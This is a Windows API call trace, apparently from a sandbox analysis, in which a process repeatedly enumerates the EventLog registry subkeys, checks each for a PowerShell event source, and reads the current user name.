	[0404.645] CoTaskMemFree (pv=0x0) 
	[0404.645] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.645] RegEnumKeyExW (in: hKey=0x1d0, dwIndex=0x2, lpName=0x12b510, lpcchName=0x28d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.645] CoTaskMemFree (pv=0x12b510) 
	[0404.645] CoTaskMemFree (pv=0x0) 
	[0404.645] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.645] RegEnumKeyExW (in: hKey=0x1d0, dwIndex=0x3, lpName=0x12b510, lpcchName=0x28d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.646] CoTaskMemFree (pv=0x12b510) 
	[0404.646] CoTaskMemFree (pv=0x0) 
	[0404.646] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.646] RegEnumKeyExW (in: hKey=0x1d0, dwIndex=0x4, lpName=0x12b510, lpcchName=0x28d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.646] CoTaskMemFree (pv=0x12b510) 
	[0404.646] CoTaskMemFree (pv=0x0) 
	[0404.646] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.646] RegEnumKeyExW (in: hKey=0x1d0, dwIndex=0x5, lpName=0x12b510, lpcchName=0x28d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.646] CoTaskMemFree (pv=0x12b510) 
	[0404.646] CoTaskMemFree (pv=0x0) 
	[0404.646] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.646] RegEnumKeyExW (in: hKey=0x1d0, dwIndex=0x6, lpName=0x12b510, lpcchName=0x28d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.646] CoTaskMemFree (pv=0x12b510) 
	[0404.646] CoTaskMemFree (pv=0x0) 
	[0404.646] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.646] RegEnumKeyExW (in: hKey=0x1d0, dwIndex=0x7, lpName=0x12b510, lpcchName=0x28d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.647] CoTaskMemFree (pv=0x12b510) 
	[0404.647] CoTaskMemFree (pv=0x0) 
	[0404.647] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.647] RegEnumKeyExW (in: hKey=0x1d0, dwIndex=0x8, lpName=0x12b510, lpcchName=0x28d698, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d698, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0404.647] CoTaskMemFree (pv=0x12b510) 
	[0404.647] CoTaskMemFree (pv=0x0) 
	[0404.647] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x1cc) returned 0x0
	[0404.647] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x0) returned 0x2
	[0404.647] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x30c) returned 0x0
	[0404.647] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x0) returned 0x2
	[0404.647] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x320) returned 0x0
	[0404.647] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x0) returned 0x2
	[0404.648] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x334) returned 0x0
	[0404.648] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x0) returned 0x2
	[0404.648] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x338) returned 0x0
	[0404.648] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x0) returned 0x2
	[0404.648] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x33c) returned 0x0
	[0404.648] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x0) returned 0x2
	[0404.648] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x340) returned 0x0
	[0404.648] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x0) returned 0x2
	[0404.648] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x344) returned 0x0
	[0404.648] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x0) returned 0x2
	[0404.649] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x348) returned 0x0
	[0404.649] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6f8 | out: phkResult=0x28d6f8*=0x34c) returned 0x0
	[0404.649] RegCloseKey (hKey=0x34c) returned 0x0
	[0404.649] RegCloseKey (hKey=0x1d0) returned 0x0
	[0404.650] RegCloseKey (hKey=0x348) returned 0x0
	[0404.665] CoTaskMemAlloc (cb=0x804) returned 0x1b78cf60
	[0404.666] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b78cf60, nSize=0x28d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d908) returned 0x1
	[0404.667] CoTaskMemFree (pv=0x1b78cf60) 
	[0404.668] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0404.668] GetUserNameW (in: lpBuffer=0x12b510, pcbBuffer=0x28d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d948) returned 1
	[0404.668] CoTaskMemFree (pv=0x12b510) 
	[0405.580] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d648 | out: phkResult=0x28d648*=0x334) returned 0x0
	[0405.580] RegQueryInfoKeyW (in: hKey=0x334, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d5bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d5b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d5bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d5b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.580] CoTaskMemFree (pv=0x0) 
	[0405.580] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.580] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x0, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.580] CoTaskMemFree (pv=0x12b510) 
	[0405.580] CoTaskMemFree (pv=0x0) 
	[0405.580] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.580] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x1, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.580] CoTaskMemFree (pv=0x12b510) 
	[0405.580] CoTaskMemFree (pv=0x0) 
	[0405.580] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.580] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x2, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.580] CoTaskMemFree (pv=0x12b510) 
	[0405.580] CoTaskMemFree (pv=0x0) 
	[0405.580] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.580] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x3, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.581] CoTaskMemFree (pv=0x12b510) 
	[0405.581] CoTaskMemFree (pv=0x0) 
	[0405.581] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.581] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x4, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.581] CoTaskMemFree (pv=0x12b510) 
	[0405.581] CoTaskMemFree (pv=0x0) 
	[0405.581] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.581] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x5, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.581] CoTaskMemFree (pv=0x12b510) 
	[0405.581] CoTaskMemFree (pv=0x0) 
	[0405.581] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.581] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x6, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.581] CoTaskMemFree (pv=0x12b510) 
	[0405.581] CoTaskMemFree (pv=0x0) 
	[0405.581] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.581] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x7, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.581] CoTaskMemFree (pv=0x12b510) 
	[0405.581] CoTaskMemFree (pv=0x0) 
	[0405.581] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.581] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x8, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.581] CoTaskMemFree (pv=0x12b510) 
	[0405.581] CoTaskMemFree (pv=0x0) 
	[0405.581] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x338) returned 0x0
	[0405.581] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.582] RegOpenKeyExW (in: hKey=0x334, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x33c) returned 0x0
	[0405.582] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.582] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x340) returned 0x0
	[0405.582] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.582] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x344) returned 0x0
	[0405.582] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.582] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x1c8) returned 0x0
	[0405.582] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.582] RegOpenKeyExW (in: hKey=0x334, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x330) returned 0x0
	[0405.582] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.582] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x1cc) returned 0x0
	[0405.583] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.583] RegOpenKeyExW (in: hKey=0x334, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x30c) returned 0x0
	[0405.583] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.583] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x320) returned 0x0
	[0405.583] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x350) returned 0x0
	[0405.583] RegCloseKey (hKey=0x350) returned 0x0
	[0405.583] RegCloseKey (hKey=0x334) returned 0x0
	[0405.584] RegCloseKey (hKey=0x320) returned 0x0
	[0405.584] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d648 | out: phkResult=0x28d648*=0x320) returned 0x0
	[0405.584] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d5bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d5b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d5bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d5b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.584] CoTaskMemFree (pv=0x0) 
	[0405.584] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.584] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.585] CoTaskMemFree (pv=0x12b510) 
	[0405.585] CoTaskMemFree (pv=0x0) 
	[0405.585] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.585] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.585] CoTaskMemFree (pv=0x12b510) 
	[0405.585] CoTaskMemFree (pv=0x0) 
	[0405.585] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.585] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.585] CoTaskMemFree (pv=0x12b510) 
	[0405.585] CoTaskMemFree (pv=0x0) 
	[0405.585] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.585] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.585] CoTaskMemFree (pv=0x12b510) 
	[0405.585] CoTaskMemFree (pv=0x0) 
	[0405.585] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.585] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.585] CoTaskMemFree (pv=0x12b510) 
	[0405.585] CoTaskMemFree (pv=0x0) 
	[0405.585] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.585] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.585] CoTaskMemFree (pv=0x12b510) 
	[0405.585] CoTaskMemFree (pv=0x0) 
	[0405.585] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.586] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.586] CoTaskMemFree (pv=0x12b510) 
	[0405.586] CoTaskMemFree (pv=0x0) 
	[0405.586] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.586] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.586] CoTaskMemFree (pv=0x12b510) 
	[0405.586] CoTaskMemFree (pv=0x0) 
	[0405.586] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.586] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x12b510, lpcchName=0x28d648, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d648, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.586] CoTaskMemFree (pv=0x12b510) 
	[0405.586] CoTaskMemFree (pv=0x0) 
	[0405.586] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x334) returned 0x0
	[0405.586] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.586] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x350) returned 0x0
	[0405.586] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.586] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x354) returned 0x0
	[0405.586] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.587] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x358) returned 0x0
	[0405.587] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.587] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x35c) returned 0x0
	[0405.587] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.587] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x360) returned 0x0
	[0405.587] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.587] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x364) returned 0x0
	[0405.587] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.587] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x368) returned 0x0
	[0405.587] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x0) returned 0x2
	[0405.587] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x36c) returned 0x0
	[0405.588] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d6a8 | out: phkResult=0x28d6a8*=0x370) returned 0x0
	[0405.588] RegCloseKey (hKey=0x370) returned 0x0
	[0405.588] RegCloseKey (hKey=0x320) returned 0x0
	[0405.588] RegCloseKey (hKey=0x36c) returned 0x0
	[0405.589] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d618 | out: phkResult=0x28d618*=0x36c) returned 0x0
	[0405.589] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d58c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d588, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d58c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d588*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.589] CoTaskMemFree (pv=0x0) 
	[0405.589] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.589] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x12b510, lpcchName=0x28d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.589] CoTaskMemFree (pv=0x12b510) 
	[0405.589] CoTaskMemFree (pv=0x0) 
	[0405.589] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.589] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x12b510, lpcchName=0x28d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0405.589] CoTaskMemFree (pv=0x12b510) 
	[0405.589] CoTaskMemFree (pv=0x0) 
	[0405.589] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0405.589] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x12b510, lpcchName=0x28d618, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d618, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
